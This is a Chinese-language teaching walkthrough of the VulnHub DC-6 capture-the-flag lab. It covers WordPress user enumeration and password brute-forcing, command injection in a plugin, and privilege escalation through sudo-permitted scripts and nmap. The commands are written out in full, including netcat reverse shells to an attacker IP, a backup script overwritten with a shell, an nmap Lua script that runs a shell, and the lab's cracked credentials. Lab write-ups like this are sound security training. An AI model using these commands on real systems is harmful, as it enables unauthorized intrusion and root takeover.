VnlnHub DC-6
字数 1213 2025-08-06 08:35:00

DC-6 靶场渗透测试教学文档

靶场概述

DC-6 是 VulnHub 上的一个渗透测试靶场,目标是获取 root 权限并找到唯一的 flag。该靶场模拟了一个 WordPress 网站环境,包含多个用户账户和权限提升路径。

环境搭建

  1. 下载靶场镜像

    • 下载地址:https://www.vulnhub.com/entry/dc-6,315/
    • 文件格式:.OVA 压缩文件

  2. 导入虚拟机

    • 使用 VMware 直接导入 OVA 文件
    • 指定解压位置

  3. 网络配置

    • 网卡模式选择 NAT(与攻击机 Kali 保持一致)
    • 开机后靶场搭建完成

信息收集

  1. 发现目标 IP

    nmap -sP -T4 192.168.48.0/24
    • 发现 192.168.48.144 为靶机 IP

  2. 端口扫描

    nmap -sS -p 1-65535 -A 192.168.48.144
    • 开放端口:
      • 22/tcp: SSH 服务
      • 80/tcp: HTTP 服务(WordPress 网站)

Web 渗透

  1. 访问网站

    • 需要修改 hosts 文件: 
      vi /etc/hosts
192.168.48.144 wordy
    • 访问 http://wordy

  2. 目录扫描

    • 发现 WordPress 后台登录页面

  3. 用户枚举

    wpscan --url http://wordy/ -e u
    • 发现 5 个用户名:
      • admin
      • mark
      • graham
      • sarah
      • jens

  4. 密码爆破

    • 使用过滤后的密码字典: 
      cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt
    • 如果 rockyou.txt 不存在,先解压: 
      cd /usr/share/wordlists
gunzip rockyou.txt.gz
    • 执行爆破: 
      wpscan --url http://wordy/ -U dc6user.txt -P password.txt
    • 成功爆破出凭据:mark/helpdesk01

获取初始访问

  1. 登录 WordPress 后台

    • 发现 "Activity monitor" 插件的 "lookup" 功能存在命令注入漏洞

  2. 绕过输入限制

    • 通过 Burp Suite 拦截请求修改参数值
    • 或者修改前端 HTML 的 maxlength 属性

  3. 获取反向 shell

    • 攻击机监听: 
      nc -lvp 4444
    • 执行命令: 
      nc -e /bin/sh 192.168.48.136 4444
    • 升级为完整 shell: 
      python -c 'import pty;pty.spawn("/bin/bash")'

横向移动

  1. 查找用户信息

    cd /home
ls
cd mark
cat stuff/things-to-do.txt
    • 发现新凭据:graham/GSo7isUM1D4

  2. SSH 登录

    ssh graham@192.168.48.144

权限提升

第一阶段提权(graham → jens)

  1. 检查 sudo 权限

    sudo -l
    • 发现可以无需密码以 jens 身份执行 /home/jens/backups.sh

  2. 利用备份脚本

    • 编辑 backups.sh 添加反弹 shell: 
      echo 'nc 192.168.48.136 5555 -e /bin/bash' > /home/jens/backups.sh
    • 攻击机监听新端口: 
      nc -lvp 5555
    • 执行脚本: 
      sudo -u jens /home/jens/backups.sh
    • 升级为完整 shell

第二阶段提权(jens → root)

  1. 检查 sudo 权限

    sudo -l
    • 发现可以 root 权限执行 nmap

  2. 利用 nmap 交互模式

    • 创建 Lua 脚本反弹 shell: 
      cd /tmp
echo 'os.execute("nc 192.168.48.136 7777 -e /bin/sh")' > root.sh
    • 攻击机监听: 
      nc -lvp 7777
    • 执行 nmap: 
      sudo nmap --script=root.sh
    • 成功获取 root shell

获取 Flag

cd /root
cat theflag.txt

总结

本靶场渗透路径:

  1. WordPress 用户枚举 → 密码爆破
  2. 插件命令注入 → 获取初始 shell
  3. 信息收集 → 发现新凭据
  4. SSH 登录 → 检查 sudo 权限
  5. 利用可写脚本 → 横向移动
  6. 利用 nmap 特权 → 最终提权

关键点:

  • 密码字典过滤技巧
  • 命令注入绕过技术
  • 多阶段权限提升思路
  • sudo 权限的灵活利用
DC-6 靶场渗透测试教学文档 靶场概述 DC-6 是 VulnHub 上的一个渗透测试靶场,目标是获取 root 权限并找到唯一的 flag。该靶场模拟了一个 WordPress 网站环境,包含多个用户账户和权限提升路径。 环境搭建 下载靶场镜像 : 下载地址:https://www.vulnhub.com/entry/dc-6,315/ 文件格式:.OVA 压缩文件 导入虚拟机 : 使用 VMware 直接导入 OVA 文件 指定解压位置 网络配置 : 网卡模式选择 NAT(与攻击机 Kali 保持一致) 开机后靶场搭建完成 信息收集 发现目标 IP : 发现 192.168.48.144 为靶机 IP 端口扫描 : 开放端口: 22/tcp: SSH 服务 80/tcp: HTTP 服务(WordPress 网站) Web 渗透 访问网站 : 需要修改 hosts 文件: 访问 http://wordy 目录扫描 : 发现 WordPress 后台登录页面 用户枚举 : 发现 5 个用户名: admin mark graham sarah jens 密码爆破 : 使用过滤后的密码字典: 如果 rockyou.txt 不存在,先解压: 执行爆破: 成功爆破出凭据:mark/helpdesk01 获取初始访问 登录 WordPress 后台 : 发现 "Activity monitor" 插件的 "lookup" 功能存在命令注入漏洞 绕过输入限制 : 通过 Burp Suite 拦截请求修改参数值 或者修改前端 HTML 的 maxlength 属性 获取反向 shell : 攻击机监听: 执行命令: 升级为完整 shell: 横向移动 查找用户信息 : 发现新凭据:graham/GSo7isUM1D4 SSH 登录 : 权限提升 第一阶段提权(graham → jens) 检查 sudo 权限 : 发现可以无需密码以 jens 身份执行 /home/jens/backups.sh 利用备份脚本 : 编辑 backups.sh 添加反弹 shell: 攻击机监听新端口: 执行脚本: 升级为完整 shell 第二阶段提权(jens → root) 检查 sudo 权限 : 发现可以 root 权限执行 nmap 利用 nmap 交互模式 : 创建 Lua 脚本反弹 shell: 攻击机监听: 执行 nmap: 成功获取 root shell 获取 Flag 总结 本靶场渗透路径: WordPress 用户枚举 → 密码爆破 插件命令注入 → 获取初始 shell 信息收集 → 发现新凭据 SSH 登录 → 检查 sudo 权限 利用可写脚本 → 横向移动 利用 nmap 特权 → 最终提权 关键点: 密码字典过滤技巧 命令注入绕过技术 多阶段权限提升思路 sudo 权限的灵活利用